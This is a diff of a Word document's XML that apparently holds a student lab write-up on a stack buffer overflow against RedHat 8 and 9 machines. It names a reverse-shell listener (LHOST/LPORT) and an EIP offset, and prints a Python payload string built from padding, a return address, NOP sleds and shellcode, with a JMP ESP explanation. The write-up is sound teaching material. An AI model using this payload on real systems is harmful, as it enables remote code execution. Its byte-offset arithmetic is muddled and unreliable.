+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Regardless of which exploit is to be run: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>LHOST = 192.168.32.10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>LPORT= 8998</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
         </w:rPr>
       </w:pPr>
@@ -356,7 +417,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t>” scripts. The length for pattern create was 2000 and the offset received was 1032. However, upon testing the EIP overflows at 1030 instead of 1032. The next part is to develop a shell script</w:t>
+        <w:t>” scripts. The length for pattern create was 2000 and the offset received was 1032. The next part is to develop a shell script</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -379,7 +440,15 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> address who will be listening on some port. To create the shell script, use the </w:t>
+        <w:t xml:space="preserve"> address who will be listening on some port. To </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">create the shell script, use the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -411,15 +480,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> which will create a shell script with LHOST and LPORT, the shell code can also be specified for multiple languages, we used python. Now with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">the above information we try to create the structure of the malicious input which we will send to the </w:t>
+        <w:t xml:space="preserve"> which will create a shell script with LHOST and LPORT, the shell code can also be specified for multiple languages, we used python. Now with the above information we try to create the structure of the malicious input which we will send to the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -513,6 +574,42 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>ESSENTIALLY:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">IMPORTANT NOTE: The offset, if counted, for me comes out to 1030. This is due to the fact that when in Python3 I pass my string as a byte literal it adds “b/” to the starting of the output. This creates 2 extra bytes when sending the exploit, therefore, we subtract it. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="minorHAnsi" w:cs="Calibri"/>
           <w:b/>
         </w:rPr>
@@ -522,7 +619,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
         </w:rPr>
-        <w:t>ESSENTIALLY:</w:t>
+        <w:t>RedHat8:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -664,7 +761,21 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> which is your shell code and then some more NOP sleds and then lastly the redirection address but backwards. Then because you cannot start your string with a NOP sled(it corrupted my input), you create another string, </w:t>
+        <w:t xml:space="preserve"> which is your shell code and then some more NOP sleds and then lastly the redirection address but backwards</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(cause Little Endian)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Then because you cannot start your string with a NOP sled(it corrupted my input), you create another string, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -713,7 +824,578 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> is also considered padding so that it doesn’t corrupt your sent data. The NOPs are basically instructions that keep passing the baton to the next address. </w:t>
+        <w:t xml:space="preserve"> is also considered padding so that it doesn’t corrupt your sent data. The NOPs are basically instructions that keep passing the baton to the next address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> till it reaches your shell code. And then you have to fill all the other memory addresses with something(padding) to reach the EIP which you fill with the EIP address since RedHat8 does not randomize the ESP location. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat9:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x41</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1020</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xc7\x76\x12\x42</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>3000</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">So, lets break down the structure of the input above. Firstly, we pass 1020 As, these are important as they will help us overflow and reach the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>eip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Our EIP is at a distance of 1032, so the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which starts with “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">” adds 10 bytes and the “b/” from using byte literals in python3 account for the remaining 12 bytes, thus, bringing us to 1032 bytes. Now, when we reach this distance, that is where the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">input starts overflowing into the EIP. Now, as RedHat9 randomizes the ESP address, we cannot just put a static address(its still a static address, just not whatever the ESP address will be). We load the ESP with a JMP ESP instruction, this instruction basically tells your EIP to jump to wherever the ESP is located. After that, we fill our stack with some padding of NOP sleds again and put our shell code in the middle and then put some more NOP sleds. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -748,6 +1430,30 @@
         <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
